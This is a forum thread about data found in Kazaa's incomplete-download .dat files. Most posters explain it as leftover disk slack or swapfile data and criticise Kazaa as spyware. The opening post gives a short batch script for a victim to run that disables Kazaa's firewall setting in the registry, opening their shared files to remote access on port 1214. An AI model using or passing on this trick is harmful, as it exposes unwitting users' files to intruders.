Printable View
In the olg Kazaa ver', u jast need to write: Http://IP:1214
(IP=IP that the Poet 1214 open)
and in New Kazaa Ver', u need that the Victim run this Exploit:
The exploit: (*.bat)
echo off
reg add HKEY_LOCAL_MACHINE\SOFTWARE\KaZaA\ -/v FirewallStatus /d 0
and after the Victim run this, u need to enter:
Http://IP:1214
bye.
WOW, that was possibly the most irrelevant thing i have ever seen!
I would think that this info you are finding is left over data that used to be in the place of the .dat file, left overs from previously downloaded files and files that have been moved. Kazaa probably reserves the space for the .dat file and doesnt overwrite whats on that portion of the hd but rather leaves it there and the .dat file functions as a way to view this information.
Perhaps this could be a form of data recovery if fully researched and what not.
Kazaa lite came with this little program call dat_veiw
.DAT file manager & viewer v0.6
for .dat (incomplete) files from Kazaa, imesh, grokster
I search google and this is the link it gave me so you can download it
http://www.angelfire.com/ego2/idlelo...s/dat_view.htm
i would say that DS is most likely right. You are not seeing information from the other persons computer. You are seeing information from your own computer. Especially if there is a minimum 100kb size. Then if you only dl 50 kb, you have another 50 kb left over, because the file size is going to be 100kb. Instead of overwriting whatever is on your HD, it is just reading what is there from the file that was in that position on the hard drive before... in case you don't know or you forgot, when you delete a file, it doesn't change the hard drive, it just removes the file from the file allocation table, so all the data is still on your disk, you just can't see it anymore (unless you use some type of forensic software)
Yes the text scaps are definately from the computer kazaa originally downloaded to, not any remote machine. I downloaded the .dat files from another machine which is how I got info in the dat's from her machine. The problem is that these dat files are by design in the kazaa shared folder although they aren't by default accessible remotely. Considering the types of text I'm seeing I'm thinking there source is the windows swapfile (Win386.swp). Otherwise it shouldn't have been able to recover some of the things it did from my machine. I considering writting an app to try to emulate the behavior.
I'm assuming these strange bits of data are being seen of FAT file systems.Quote:
Originally posted here by Darksnake
I would think that this info you are finding is left over data that used to be in the place of the .dat file, left overs from previously downloaded files and files that have been moved. Kazaa probably reserves the space for the .dat file and doesnt overwrite whats on that portion of the hd but rather leaves it there and the .dat file functions as a way to view this information.
Perhaps this could be a form of data recovery if fully researched and what not.
IIRC if an entry in the FAT is made for a file of say 10K, but only 2K is written to then the remaining 8K will contain what used to be on the area of the disk that the FAT table is pointing to. If it's a brand new hard drive, you'll probably not see anything. If not it's likely to contain information you've recently deleted or changed. In this way the people viewing this will seem to experience information that is both relevant and timely.
I guess when Kazza begins a download it knows how big the file is going to be to begin with, and reserves the correct amount of space in the FAT and then starts overwriting what was left on the hard drive as it goes along.
Yes this could be a form of data recovery, and it is used by many forms of commercial undelete applications, but often you have to tell them where on the dard drive to start looking. Personally I've never found it very useful.
Did everyone forget that Kazaa is one of the worst spyware applications out there?
Of course we diddn't forget "roadclosed"....but how does it apply here? Please explain further....I'm guessing you have a theory about how this ties into spyware?
I can't actually comment on technical details because I don’t have Kazaa. I have almost downloaded Kazaa so I can see what the .dat files look like for fun, it's interesting reading the thread. I don't have a pc right now that I consider a low enough risk (based on my paranoia level) to put Kazaa on since you can basically rape someone's pc with Kazaa related exploits. Don't undermine the fact that Kazaa is a server that is part of a super node of computers. Kazaa authors didn't exactly take all their resources and apply it toward the security model. They are more in tune with tweaking Kazaa for the purpose it was written and why no one should be surprised that personal data is found in the application. Its sole purpose of revenue is to collect data and pass it on to Cydoor and BDE (there are others but those are the main ones) who make another connection to their own marketing servers and store additional cashes of you information on your PC. Kazaa makes its money by passing your habits and demographics to these guys. Kazza lite works by eliminating these dependencies and tricking the application to think it's connecting to Cydoor etc. I was just thinking, it's spy ware so data has to be stored. And a logical place is a .dat file that Kazza uses to keep track of file parts and who the download source is….and apparently your last 10 websites. :eek:
The disussion of EXACTLY how and where it does that is interesting.